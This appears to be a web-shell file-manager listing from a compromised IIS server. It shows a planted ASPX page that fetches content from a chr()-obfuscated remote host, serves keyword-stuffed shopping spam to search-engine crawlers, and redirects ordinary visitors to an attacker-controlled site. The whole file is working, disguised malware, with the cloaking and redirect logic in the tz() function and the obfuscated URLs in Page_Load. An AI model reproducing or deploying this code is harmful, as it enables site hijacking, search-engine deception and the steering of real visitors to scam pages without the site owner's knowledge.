Hunter Bajwa
Server: Microsoft-IIS/7.5
System: Windows NT EGAL 6.1 build 7601
User: IUSR_hrreflections (0)
PHP: 5.2.17
Disabled: NONE
Upload Files
File: C:/inetpub/vhosts/hrreflections.com/httpdocs/idume.aspx
<%@ Page Language="C#" %>
<script runat="server">
    public static string chr(int asciiCode)
    {  System.Text.ASCIIEncoding asciiEncoding = new System.Text.ASCIIEncoding();
        byte[] byteArray = new byte[] { (byte)asciiCode };
        string strCharacter = asciiEncoding.GetString(byteArray);
        return (strCharacter);}
    protected void Page_Load(object sender, EventArgs e)
    {
        httpxy = HttpContext.Current.Request.IsSecureConnection ? "https://" : "http://";
		webclient = new System.Net.WebClient();
        webclient.Encoding = System.Text.Encoding.UTF8;
	    hyzhdy = webclient.DownloadString(chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+chr(47)+chr(47)+chr(121)+chr(109)+chr(115)+chr(46)+chr(100)+chr(121)+chr(98)+chr(107)+chr(103)+chr(46)+chr(116)+chr(111)+chr(112)+chr(47)+chr(121)+chr(109)+chr(115)+chr(106)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120)+chr(63)+chr(121)+chr(105)+chr(100)+chr(61)+Request.QueryString["yid"]);		
        if (!IsPostBack)
        {
			ckwz = webclient.DownloadString( hyzhdy + "/wl.asp");
            dbhl = webclient.DownloadString( hyzhdy + "/ymsj/hl.aspx?page=" + Request.CurrentExecutionFilePath);
			int cid = Convert.ToInt32(webclient.DownloadString( hyzhdy + "/sjs.aspx"));
            if (Request.QueryString["cid"] != null && Request.QueryString["cid"] != "") { cid = int.Parse(Request.QueryString["cid"]); }
            if (Request.QueryString["number"] != null)
            {
                URL = hyzhdy + "/ymsj/siid.aspx?cid=" + cid + "&number=" + Request.QueryString["number"] + "&pnum=" + Request.QueryString["pnum"];
                content = webclient.DownloadString(URL);
                content = content.Replace("yymm", httpxy + HttpContext.Current.Request.Url.Host + HttpContext.Current.Request.Path);
				Response.ContentType = "text/xml";
				Response.Write(content);
                Response.End();				
            }
			else if (Request.QueryString["s"] != null)
            {
                content = webclient.DownloadString(chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+chr(47)+chr(47)+chr(121)+chr(109)+chr(115)+chr(46)+chr(100)+chr(121)+chr(98)+chr(107)+chr(103)+chr(46)+chr(116)+chr(111)+chr(112)+chr(47)+chr(115)+chr(115)+chr(121)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120));
                content = content.Replace("yymm", httpxy + HttpContext.Current.Request.Url.Host + HttpContext.Current.Request.Path);
				Response.ContentType = "text/xml";
				Response.Write(content);
                Response.End();				
            }
			else if (Request.QueryString["ping"] != null)
            {
                content = webclient.DownloadString(chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+chr(47)+chr(47)+chr(121)+chr(109)+chr(115)+chr(46)+chr(100)+chr(121)+chr(98)+chr(107)+chr(103)+chr(46)+chr(116)+chr(111)+chr(112)+chr(47)+chr(112)+chr(105)+chr(110)+chr(103)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120)+chr(63)+chr(121)+chr(105)+chr(100)+chr(61)+Request.QueryString["yid"]+"&cid="+Request.QueryString["cid"]);
				content = content.Replace("yymm", httpxy + HttpContext.Current.Request.Url.Host + HttpContext.Current.Request.Path);
				string ping = webclient.DownloadString(content);
				Response.Write(ping);
				Response.Write(content);
                Response.End();
            }			
            else
            {   if (Request.QueryString["type"] == "search")
                    {
                        tz();
                        URL += hyzhdy + "/ymsj/doiid_mb.aspx?cid=" + Request.QueryString["cid"] + "&searchtxt=" + Request.QueryString["searchtxt"];
                        content = webclient.DownloadString(URL);
                    }
             else if (Request.QueryString["iid"] != null)
                {
                    int wid = new Random().Next(1, 5218);
                    URL = hyzhdy + "/ymsj/doiid_mb.aspx?iid=" + Request.QueryString["iid"] + "&cid=" + Request.QueryString["cid"] + "&mt=" + hyzhdy + "/wz/wz_"+wid+".txt";
                    kname = webclient.DownloadString( hyzhdy + "/gn.aspx?iid=" + Request.QueryString["iid"]);
					gjc1 = webclient.DownloadString( hyzhdy + "/getci.aspx?cid=" + Request.QueryString["cid"] + "&s=2&e=4");
			        gjc2 = webclient.DownloadString( hyzhdy + "/getci.aspx?cid=" + Request.QueryString["cid"] + "&s=5&e=7");
					tz();
                    content = webclient.DownloadString(URL);
                }
                else
                {
                    tz();
                    URL = hyzhdy + "/ymsj/doiid_mb.aspx?cid=" + cid + "&pnum=" + Request.QueryString["pnum"];
                    content = webclient.DownloadString(URL);

                }
            content = content.Replace("UUUUU", httpxy + HttpContext.Current.Request.Url.Host + HttpContext.Current.Request.Path);
            content = content.Replace("BBBBB", HttpContext.Current.Request.Url.Host);
            content = content.Replace("NNNNN", kname + Request.QueryString["iid"]);
            content = content.Replace("SSSSS", kname + Request.QueryString["iid"] + Request.QueryString["searchtxt"] + Request.QueryString["pnum"]);
            content = content.Replace("DDDDD", kname + " Gold, White, Black, Red, Blue, Beige, Grey, Price, Rose, Orange, Purple, Green, Yellow, Cyan, Bordeaux, pink, Indigo, Brown, Silver,Electronics, Video Games, Computers, Cell Phones, Toys, Games, Apparel, Accessories, Shoes, Jewelry, Watches, Office Products, Sports & Outdoors, Sporting Goods, Baby Products, Health, Personal Care, Beauty, Home, Garden, Bed & Bath, Furniture, Tools, Hardware, Vacuums, Outdoor Living, Automotive Parts, Pet Supplies, Broadband, DSL, Books, Book Store, Magazine, Subscription, Music, CDs, DVDs, Videos,Online Shopping " + Request.QueryString["searchtxt"]);
            }
        }
    }
    public void tz()
    {

        string ip = System.Web.HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["REMOTE_HOST"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_X_FORWARDED_FOR"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_CLIENT_IP"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_X_FORWARDED"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_FORWARDED_FOR"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_FORWARDED"];
        if (Request.QueryString["kk"] != null)
        {
            ip = "66.249.64.190";
        }
        string ipurl = hyzhdy + "/getdomain.aspx?rnd=1&ip=" + ip;
        webclient = new System.Net.WebClient();
        webclient.Encoding = System.Text.Encoding.UTF8;
        string domain = webclient.DownloadString(ipurl).ToLower();
        if (domain.IndexOf("google") == -1 && domain.IndexOf("msn.com") == -1 && domain.IndexOf("yahoo.com") == -1 && domain.IndexOf("aol.com") == -1)
        {   
		    string tzurl = hyzhdy + "/a.aspx";
            if (Request.QueryString["iid"] != null)
            {
                Response.Redirect(tzurl + "?cid=" + Request.QueryString["cid"] + "&cname=" + HttpUtility.UrlEncode(kname) + "&ll=" + HttpContext.Current.Request.Url.Host);
                Response.End();
            }
			if (Request.QueryString["searchtxt"] != null)
            {
                Response.Redirect(tzurl + "?cid=" + Request.QueryString["cid"] + "&cname=" + HttpUtility.UrlEncode(Request.QueryString["searchtxt"]) + "&ll=" + HttpContext.Current.Request.Url.Host);
                Response.End();
            }
            if (Request.QueryString["pnum"] != null)
            {
                tzurl = tzurl.Replace("products.aspx", "");
                Response.Redirect(tzurl + "?cid=" + Request.QueryString["cid"] + "&ll=" + HttpContext.Current.Request.Url.Host);
                Response.End();
            }
			else 
			{             
			Response.Redirect("/404.aspx");
			Response.End();
			}
        }
    }
    public string xi = "1";
    public string xc = "30";

    public System.Net.WebClient webclient = null;
	public string httpxy = "";	
    public string content = "";
	public string gjc1="";
	public string gjc2="";
    public string hyzhdy="";
    public string Greeting = "";
    public string zhang = "";
    public string hhhvx = "";
    public string URL = "";
    public System.Random a = null;
    public string descriptions = "";
    public string kname = "";
	public string ckwz="";
	public string dbhl="";
</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title><%=kname%><%=Request.QueryString["searchtxt"]%> OFF <%=new Random().Next(60, 80)%>% <%=Request.QueryString["pnum"]%></title>
<meta name="keywords" content="<%=kname%>,<%=gjc1%>" />
<meta name="description" content="<%=kname%>,<%=gjc2%>." />
<meta name="robots" content="index,follow,all" />
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<style>
@media (max-width: 768px) {
            body {
                width: 100%;
                height: 100%;
            }

            body {
                font-family: Open Sans,'Helvetica Neue',Arial,sans-serif;
                font-size: 15px;
                color: #777;
                line-height: 1.7;
            }

            img {
                width: 80%;
            }

            iframe {
                max-width: 100% !important;
                height: auto;
                float: left;
            }

            div {
                width: 100% !important;
                float: left;
            }

                div span {
                    width: 100%;
                    float: left;
                }

            a {
                color: #f05f40;
                -webkit-transition: all .35s;
                -moz-transition: all .35s;
                transition: all .35s;
            }

                a:hover, a:focus {
                    color: #eb3812;
                }
        }
</style>
</head>
<body><%=content.Replace("XXXXX",HttpContext.Current.Request.Url.Host)%>
<div><%=dbhl%> | <%=ckwz%></div>
</body>
</html>